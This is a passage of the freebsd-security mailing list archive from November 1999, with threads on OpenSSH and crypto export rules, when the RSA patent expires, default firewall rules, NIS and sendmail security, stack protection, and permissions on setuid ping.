Tue, 2 Nov 1999 16:53:43 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Jacques Vidrine Cc: "Jordan K. Hubbard" , security@FreeBSD.ORG Subject: Re: OpenSSH patches In-Reply-To: <19991102212757.C69B51DA4@bone.nectar.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Jacques Vidrine wrote: > [dropped -ports] > On 2 November 1999 at 10:58, "Jordan K. Hubbard" wrote: > > For a lot of good reasons, this is something we really > > need, even if we have to take a few chances and/or move a CVS server > > to Canada. :) > > Don't we already have a CVS server in South Africa for this kind of > thing? I must admit this crypto export stuff is seriously irritating. Makes me want to move *myself* to South Africa. I believe the answer to your question is yes--I think though that Jordan means the primary CVS server for FreeBSD, not just the CVS server for the -crypto code. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 15:30:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (Postfix) with ESMTP id CEC3415560; Tue, 2 Nov 1999 15:29:45 -0800 (PST) (envelope-from joe@florence.pavilion.net) Received: (from joe@localhost) by florence.pavilion.net (8.9.3/8.8.8) id XAA79882; Tue, 2 Nov 1999 23:29:12 GMT (envelope-from joe) Date: Tue, 2 Nov 1999 23:29:12 +0000 From: Josef Karthauser To: "Jordan K. Hubbard" Cc: Robert Watson , Poul-Henning Kamp , Kris Kennaway , security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches Message-ID: <19991102232912.C79916@florence.pavilion.net> References: <56026.941569117@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: <56026.941569117@localhost> X-NCC-RegID: uk.pavilion Organisation: Pavilion Internet plc, 24 The Old Steine, Brighton, BN1 1EL, England Phone: +44-845-333-5000 Fax: +44-845-333-5001 Mobile: +44-403-596893 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Nov 02, 1999 at 10:58:37AM -0800, Jordan K. Hubbard wrote: > > > BTW, "they" tell me that when the new crypto guidelines are released, the > > chances are they will also be friendly to open source. Hopefully "they" > > are right. (they being people appropriately placed in the process) > > I've been told the same thing but am investigating an export license > in any case. For a lot of good reasons, this is something we really > need, even if we have to take a few chances and/or move a CVS server > to Canada. :) Or England ;) Joe -- Josef Karthauser FreeBSD: How many times have you booted today? Technical Manager Viagra for your server (http://www.uk.freebsd.org) Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 17:29:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8710A1547B; Tue, 2 Nov 1999 17:29:06 -0800 (PST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id SAA67463; Tue, 2 Nov 1999 18:29:02 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA16579; Tue, 2 Nov 1999 18:31:27 -0700 (MST) Message-Id: <199911030131.SAA16579@harmony.village.org> To: "Gary D. Kline" Subject: Re: OpenSSH patches Cc: dugsong@monkey.org (Dug Song), provos@citi.umich.edu, security@FreeBSD.ORG, ports@FreeBSD.ORG, markus@openbsd.org In-reply-to: Your message of "Tue, 02 Nov 1999 09:49:01 PST." <199911021749.JAA10864@tao.thought.org> References: <199911021749.JAA10864@tao.thought.org> Date: Tue, 02 Nov 1999 18:31:27 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199911021749.JAA10864@tao.thought.org> "Gary D. Kline" writes: : Anybody know how much longer the RSA patent : hold? Seems to me it runs out in the next few : years. They said October 2000 at FreeBSD Con. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 17:30: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7CC7F15488; Tue, 2 Nov 1999 17:30:02 -0800 (PST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id SAA67469; Tue, 2 Nov 1999 18:29:59 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA16592; Tue, 2 Nov 1999 18:32:24 -0700 (MST) Message-Id: <199911030132.SAA16592@harmony.village.org> To: Dug Song Subject: Re: OpenSSH patches Cc: "Gary D. Kline" , provos@citi.umich.edu, security@FreeBSD.ORG, ports@FreeBSD.ORG, markus@openbsd.org In-reply-to: Your message of "Tue, 02 Nov 1999 14:02:44 EST." References: Date: Tue, 02 Nov 1999 18:32:24 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Dug Song writes: : Patents can be renewed. Patents cannot be renewed. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 17:31:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8984F1556C for ; Tue, 2 Nov 1999 17:31:16 -0800 (PST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id SAA67482; Tue, 2 Nov 1999 18:31:15 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA16612; Tue, 2 Nov 1999 18:33:41 -0700 (MST) Message-Id: <199911030133.SAA16612@harmony.village.org> To: nate@mt.sri.com (Nate Williams) Subject: Re: hole(s) in default rc.firewall rules Cc: Adam Laurie , Group Paranoia In-reply-to: Your message of "Tue, 02 Nov 1999 14:13:42 MST." <199911022113.OAA25375@mt.sri.com> References: <199911022113.OAA25375@mt.sri.com> <381F4AAD.1D8E6001@algroup.co.uk> Date: Tue, 02 Nov 1999 18:33:41 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199911022113.OAA25375@mt.sri.com> Nate Williams writes: : > # block low port and NFS UDP but allow outgoing and replies for DNS, : > NTP : > # (and anything else that needs it). : > $fwcmd add pass udp from any to ${ip} 53,123 : > $fwcmd add deny udp from any to ${ip} 0-1023,1110,2049 : : What's special about 1110 and 2049? 2049 is NFS. Don't know what 1110 is. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 19:19:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from funky.monkey.org (funky.monkey.org [63.77.239.12]) by hub.freebsd.org (Postfix) with ESMTP id 07ED015301 for ; Tue, 2 Nov 1999 19:19:18 -0800 (PST) (envelope-from dugsong@monkey.org) Received: by funky.monkey.org (Postfix, from userid 1001) id A3E1C15189; Tue, 2 Nov 1999 22:19:37 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by funky.monkey.org (Postfix) with ESMTP id 95C0A14A01; Tue, 2 Nov 1999 22:19:37 -0500 (EST) Date: Tue, 2 Nov 1999 22:19:37 -0500 (EST) From: Dug Song To: Warner Losh Cc: security@FreeBSD.ORG Subject: Re: OpenSSH patches In-Reply-To: <199911030132.SAA16592@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Warner Losh wrote: > Patents cannot be renewed. looks like the bug is in the manpage, then. good news for all of us! :-) -d. --- http://www.monkey.org/~dugsong/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 20:57:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.inreach.com (mail2.inreach.com [209.142.0.6]) by hub.freebsd.org (Postfix) with ESMTP id 5B96E15463; Tue, 2 Nov 1999 20:57:43 -0800 (PST) (envelope-from condor@inreach.com) Received: from pavilion (209-142-4-154.stk.inreach.net [209.142.4.154]) by smtp.inreach.com (8.9.3/8.9.3) with SMTP id UAA27547; Tue, 2 Nov 1999 20:41:02 -0800 (PST) Received: by localhost with Microsoft MAPI; Tue, 2 Nov 1999 20:57:10 -0800 Message-ID: <01BF2574.D4747820.condor@inreach.com> From: CONDOR Reply-To: "condor@inreach.com" To: "'Warner Losh'" , Dug Song Cc: "Gary D. Kline" , "provos@citi.umich.edu" , "security@FreeBSD.ORG" , "ports@FreeBSD.ORG" , "markus@openbsd.org" Subject: RE: OpenSSH patches Date: Tue, 2 Nov 1999 20:52:30 -0800 Organization: Condor Worldwide Data Systems X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----Original Message----- From: Warner Losh [SMTP:imp@village.org] Sent: Tuesday, November 02, 1999 17:32 To: Dug Song Cc: Gary D. Kline; provos@citi.umich.edu; security@FreeBSD.ORG; ports@FreeBSD.ORG; markus@openbsd.org Subject: Re: OpenSSH patches In message Dug Song writes: : Patents can be renewed. Patents cannot be renewed. [CONDOR] They can if you planned ahead with a significant enough change to the original and refile the changes in the right way. :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 22: 9:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id 1E62015360 for ; Tue, 2 Nov 1999 22:09:17 -0800 (PST) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #2) id 11itbf-0005DS-00; Tue, 2 Nov 1999 23:09:16 -0700 Message-ID: <381FD189.32B337BF@softweyr.com> Date: Tue, 02 Nov 1999 23:09:13 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: peter.jeremy@alcatel.com.au Cc: Dug Song , security@FreeBSD.ORG Subject: Re: OpenSSH patches References: <199911021749.JAA10864@tao.thought.org> <99Nov3.073050est.40337@border.alcanet.com.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Jeremy wrote: > > On 1999-Nov-03 06:02:44 +1100, Dug Song wrote: > >from OpenBSD's ssl(8): > > > >BUGS > > According to "Applied Cryptography: Schneier" the RSA patent will > > expire September 20th, 2000. > > > > Patents can be renewed. > > Unless someone's snuck a radical change to Patent Law through recently, > this isn't true. Patents automatically pass into the public domain > after 17(?) years. Yup. Several companies including Microsoft and RSA are lobbying various Congress critters to change this to 70 (!) years. Scroom. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 23:54:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from cnidaria.digitalized.com (cr1000811-a.ym1.on.wave.home.com [24.112.39.203]) by hub.freebsd.org (Postfix) with ESMTP id 9035914F10; Tue, 2 Nov 1999 23:54:15 -0800 (PST) (envelope-from edwardk@digitalized.com) Received: from nyctereutes.digitalized.com (nyctereutes.digitalized.com [172.16.128.201]) by cnidaria.digitalized.com (Postfix) with ESMTP id 7A35B9FB11; Wed, 3 Nov 1999 02:54:14 -0500 (EST) Received: by nyctereutes.digitalized.com (Postfix, from userid 1000) id 338B0F615E; Wed, 3 Nov 1999 02:54:13 -0500 (EST) To: "condor@inreach.com" Cc: "'Warner Losh'" , Dug Song , "Gary D. Kline" , "provos@citi.umich.edu" , "security@FreeBSD.ORG" , "ports@FreeBSD.ORG" , "markus@openbsd.org" Subject: Re: OpenSSH patches References: <01BF2574.D4747820.condor@inreach.com> From: Edward Kovarski Date: 03 Nov 1999 02:54:12 -0500 In-Reply-To: CONDOR's message of "Tue, 2 Nov 1999 20:52:30 -0800" Message-ID: <87so2onh7f.fsf@nyctereutes.digitalized.com> Lines: 39 User-Agent: Gnus/5.070095 (Pterodactyl Gnus v0.95) XEmacs/21.1 (Arches) X-Face: 0F|^.]?ziw/jy%(7m;n/u:I1eL7IY46:#oi~/v:J==u,49V+u>mO&NsMkpy9rab{cAtJgX>(vO%z!FY/>eq-jky=)L7waW]A@Z)p*G>2Y4<(gp__\l$ws%1a)BEW$U#4D\ALU(cr.s0Y#y/s}ht\}BChwO^!8.t=>n{|"okCXhM#w$ MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Since patents are generally very vague in order to encompass as much as possible of a given market, the significant changes would have to create a whole new product and thus a whole new patent. You would be still able to use the old expired patent to your hearts content. If they could have done it, they would have. A few publications did some stories on RSA - mainly Bidzos - and where he was planning to take the company once their nest egg expired. Anyhow, according to RSA[1] they were issued the patent on September 29, 1983. However, according to the IBM[2] and USPTO server they are listing the issue date as September 20, 1983. Using the USPTO and IBM servers as a reference, the patent officially expires on September 20, 2000. [1] http://www.rsasecurity.com/rsalabs/faq/6-3-1.html [2] http://www.patents.ibm.com/details?&pn=US04405829__ /e CONDOR writes: > -----Original Message----- > From: Warner Losh [SMTP:imp@village.org] > Sent: Tuesday, November 02, 1999 17:32 > To: Dug Song > Cc: Gary D. Kline; provos@citi.umich.edu; security@FreeBSD.ORG; ports@FreeBSD.ORG; markus@openbsd.org > Subject: Re: OpenSSH patches > > In message Dug Song writes: > : Patents can be renewed. > > Patents cannot be renewed. > > [CONDOR] They can if you planned ahead with a significant enough change to the original and refile the changes in the right way. :-) > > Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 0:12:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from ares.maths.adelaide.edu.au (ares.maths.adelaide.edu.au [129.127.246.5]) by hub.freebsd.org (Postfix) with ESMTP id 9681515695 for ; Wed, 3 Nov 1999 00:12:00 -0800 (PST) (envelope-from glewis@ares.maths.adelaide.edu.au) Received: (from glewis@localhost) by ares.maths.adelaide.edu.au (8.9.3/8.9.3) id SAA29824 for freebsd-security@freebsd.org; Wed, 3 Nov 1999 18:41:14 +1030 (CST) (envelope-from glewis) From: Greg Lewis Message-Id: <199911030811.SAA29824@ares.maths.adelaide.edu.au> Subject: Security and NIS - alternatives? To: freebsd-security@freebsd.org Date: Wed, 3 Nov 1999 18:41:13 +1030 (CST) X-Mailer: ELM [version 2.4ME+ PL56 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, I am about to undertake setting up a number of FreeBSD workstations and have been reading up on NIS in the FreeBSD man pages. Statements like the following in yp(4) concern me somewhat: While these enhancements provide better security than stock NIS, they are by no means 100% effective. It is still possible for someone with access to your network to spoof the server into disclosing the shadow password maps. I have noted the steps which can be taken to provide better security than standard, but the fact that holes remain is a concern. I also note that NIS+ doesn't appear to be currently supported. This is not meant to be a complaint, I simply wish to ask if there is a more secure alternative? I'd like one where passwords were not sent over the network except via something like SSL or an ssh tunnel. Thanks in advance for any advice people have to offer. -- Greg Lewis glewis@trc.adelaide.edu.au Computing Officer +61 8 8303 5083 Teletraffic Research Centre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 1:10:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from zeus.agava.ru (agava.ru [212.24.32.189]) by hub.freebsd.org (Postfix) with ESMTP id E3A8C1567E for ; Wed, 3 Nov 1999 01:09:01 -0800 (PST) (envelope-from frank@hellbell.agava.ru) Received: (from uucp@localhost) by zeus.agava.ru (8.9.3/8.9.0) with UUCP id LAA28638 for freebsd-security@FreeBSD.ORG; Wed, 3 Nov 1999 11:45:07 +0300 Received: by hellbell.domain (Postfix, from userid 1038) id 62D70CCFB; Wed, 3 Nov 1999 11:44:07 +0300 (MSK) Received: from localhost (localhost [127.0.0.1]) by hellbell.domain (Postfix) with ESMTP id 2DE7D596B for ; Wed, 3 Nov 1999 11:44:07 +0300 (MSK) Date: Wed, 3 Nov 1999 11:44:07 +0300 (MSK) From: Alex Zakirov X-Sender: frank@hellbell.domain To: freebsd-security@FreeBSD.ORG Subject: stack protecting Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Where can I find ready-to-run solution for stack protecting applicable to FreeBSD? (Like StackShield, StackGuard for linux) I need set up shell box (many users probably will try to exploit it) and want recomplie suid progs at least. *** WBR, Alexey Zakirov (frank@agava.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 1:28: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from toaster.sun4c.net (toaster.sun4c.net [63.193.27.6]) by hub.freebsd.org (Postfix) with ESMTP id 729C015542 for ; Wed, 3 Nov 1999 01:28:02 -0800 (PST) (envelope-from andre@toaster.sun4c.net) Received: (from andre@localhost) by toaster.sun4c.net (8.9.3/8.9.3) id BAA18833; Wed, 3 Nov 1999 01:20:48 -0800 (PST) Date: Wed, 3 Nov 1999 01:20:48 -0800 From: Andre Gironda To: Alex Zakirov Cc: freebsd-security@FreeBSD.ORG Subject: Re: stack protecting Message-ID: <19991103012048.A18803@toaster.sun4c.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Alex Zakirov on Wed, Nov 03, 1999 at 11:44:07AM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Stack protection doesn't work as there are still heap overflows and race conditions. it's best to apply TPE patches (Phrack, Issue 52/54), like originally implemented on upt.org. Or write perfect code ;> dre On Wed, Nov 03, 1999 at 11:44:07AM +0300, Alex Zakirov wrote: > > Where can I find ready-to-run solution for stack protecting applicable to > FreeBSD? (Like StackShield, StackGuard for linux) > I need set up shell box (many users probably will try to exploit it) and > want recomplie suid progs at least. > > *** WBR, Alexey Zakirov (frank@agava.com) > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- This program has been brought to you by the language C and the number F. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 1:51: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.fintec.com (ns.fintec.com [212.153.43.10]) by hub.freebsd.org (Postfix) with ESMTP id 6D50E15530 for ; Wed, 3 Nov 1999 01:50:59 -0800 (PST) (envelope-from matt@sevenone.com) Received: from sevenone.com (matt.information-innovation.com [192.168.31.51]) by ns.fintec.com (8.9.3/8.9.3) with ESMTP id KAA11536 for ; Wed, 3 Nov 1999 10:49:44 +0100 (MET) Message-ID: <3820051F.B2BAAF89@sevenone.com> Date: Wed, 03 Nov 1999 10:49:42 +0100 From: matt baker Reply-To: matt@sevenone.com Organization: SevenOne Pty Ltd X-Mailer: Mozilla 4.7 (Macintosh; I; PPC) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Sendmail options, what's more secure? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I'm currently setting up a firewall that's using FreeBSD 3.x, and sendmail 8.9.3. The machine itself doesn't need to receive any mail, but will be passing it onto several other machines internal to the firewall (2 nic card design). Given this setup, I was wondering about the merits of either: 1. Using the RunAsUser option, setting the mqueue directory to be owned by this user, and also setting /etc/mail/aliases and similar files to be also owned by this user or group writable. It's this later part that I'm not keen on. 2. Running sendmail as root, but chrooted to a certain area using the SafeFileEnvironment option. Does this mean I have to place the mqueue and other config files in this area also? thanks for any thoughts, Matt Baker ---- matt@sevenone.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 3:44:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id BD0F914D86 for ; Wed, 3 Nov 1999 03:44:27 -0800 (PST) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id LAA02343; Wed, 3 Nov 1999 11:43:17 GMT Message-ID: <38201FD5.89EAAD09@algroup.co.uk> Date: Wed, 03 Nov 1999 11:43:17 +0000 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.07 [en] (Win95; I) MIME-Version: 1.0 To: matt@sevenone.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sendmail options, what's more secure? References: <3820051F.B2BAAF89@sevenone.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org matt baker wrote: > > Hello, > > I'm currently setting up a firewall that's using FreeBSD 3.x, and > sendmail 8.9.3. > The machine itself doesn't need to receive any mail, but will be passing > it onto several other machines internal to the firewall (2 nic card design). > > Given this setup, I was wondering about the merits of either: > > 1. Using the RunAsUser option, setting the mqueue directory to be owned > by this user, and also setting /etc/mail/aliases and similar files to be > also owned by this user or group writable. It's this later part that > I'm not keen on. > > 2. Running sendmail as root, but chrooted to a certain area using the > SafeFileEnvironment option. Does this mean I have to place the mqueue > and other config files in this area also? A popular alternative is qmail... http://www.qmail.org/ cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 5:21:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from mirage.nlink.com.br (mirage.nlink.com.br [200.249.195.3]) by hub.freebsd.org (Postfix) with ESMTP id 5B1AA14C40 for ; Wed, 3 Nov 1999 05:21:45 -0800 (PST) (envelope-from paulo@nlink.com.br) Received: from localhost (paulo@localhost) by mirage.nlink.com.br (8.9.3/8.9.1) with SMTP id LAA04815 for ; Wed, 3 Nov 1999 11:21:43 -0200 (EDT) Date: Wed, 3 Nov 1999 11:21:43 -0200 (EDT) From: Paulo Fragoso To: freebsd-security@freebsd.org Subject: Procmail and shells Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I'm configuring one server which doesn't have permisson for users to exec any program but I'm thinking use procmail instead mail.local. I thought use a blank .procmailrc with schg chflags. Are there any possible to exec using procmail and its ENV viriables? All users directories don't have execs permission (noexec flags in fstab). Will it work? This server won't permit shells access, only HTTP, FTP, POP and SMTP protocols will work. Paulo Fragoso. ------ " ... Overall we've found FreeBSD to excel in performace, stability, technical support, and of course price. Two years after discovering FreeBSD, we have yet to find a reason why we switch to anything else" -David Filo, Yahoo! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 5:45:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id A8DEA14C99 for ; Wed, 3 Nov 1999 05:45:39 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id ADC8F1A61; Tue, 2 Nov 1999 18:10:59 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14367.28547.4773.226921@anarcat.dyndns.org> Date: Tue, 2 Nov 1999 23:10:58 +0000 (GMT) To: cjclark@home.com Cc: peter.jeremy@alcatel.com.au, freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use References: <14365.48408.87230.710344@anarcat.dyndns.org> <199911020449.XAA03496@cc942873-a.ewndsr1.nj.home.com> X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --- Big Brother told Crist J. Clark to write, at 23:49 of November 1: > Spidey wrote, > > > ># Allow users to bind on a socket (which? where?) > > > > ping mode=4555 > > > Needed to allow ordinary mortals to sent raw IP (ICMP) packets. > > > > I don't think this should be enable by default... on a shell box, this > > could cause some pretty dense headaches... > > You don't think mortal users should be able to ping? IMHO, ping is a > _very_ basic utility that generally should be turned on. I don't want > to have to 'su' to root everytime I want to ping a host to see if it > is awake. Same goes for traceroute(8). > > If you want to turn off the setuid (in which case you might as well > chmod to 700 as well), you can, but I really don't see it as the > default setup. I was more thinking of something like 4750 with a 'network' gid so that only a still restricted group would be able to use ping. I don't know, in fact.. Maybe I'm being too paranoid.... :) AnarCat -- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 6: 7: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id BCB3B15506 for ; Wed, 3 Nov 1999 06:07:00 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id DC8C91A61; Wed, 3 Nov 1999 04:06:55 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14367.64303.156671.655102@anarcat.dyndns.org> Date: Wed, 3 Nov 1999 09:06:55 +0000 (GMT) To: cjclark@home.com Cc: peter.jeremy@alcatel.com.au, freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use References: <14365.48408.87230.710344@anarcat.dyndns.org> <199911020449.XAA03496@cc942873-a.ewndsr1.nj.home.com> X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org After some comments I received, I finally agree with your position... :/ I guess I do not know ping that well :) I'll repeat the argument someone gave me and that I found convincing enough: " In terms of network load, normal pings are relatively minor (and flood pings are only available to ruid==0) - if someone wants to upset a network, they can easily flood it with TCP or UDP packets. " Good bye! --- Big Brother told Crist J. Clark to write, at 23:49 of November 1: > Spidey wrote, > > > ># Allow users to bind on a socket (which? where?) > > > > ping mode=4555 > > > Needed to allow ordinary mortals to sent raw IP (ICMP) packets. > > > > I don't think this should be enable by default... on a shell box, this > > could cause some pretty dense headaches... > > You don't think mortal users should be able to ping? IMHO, ping is a > _very_ basic utility that generally should be turned on. I don't want > to have to 'su' to root everytime I want to ping a host to see if it > is awake. Same goes for traceroute(8). > > If you want to turn off the setuid (in which case you might as well > chmod to 700 as well), you can, but I really don't see it as the > default setup. > -- > Crist J. Clark cjclark@home.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 6: 8: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org 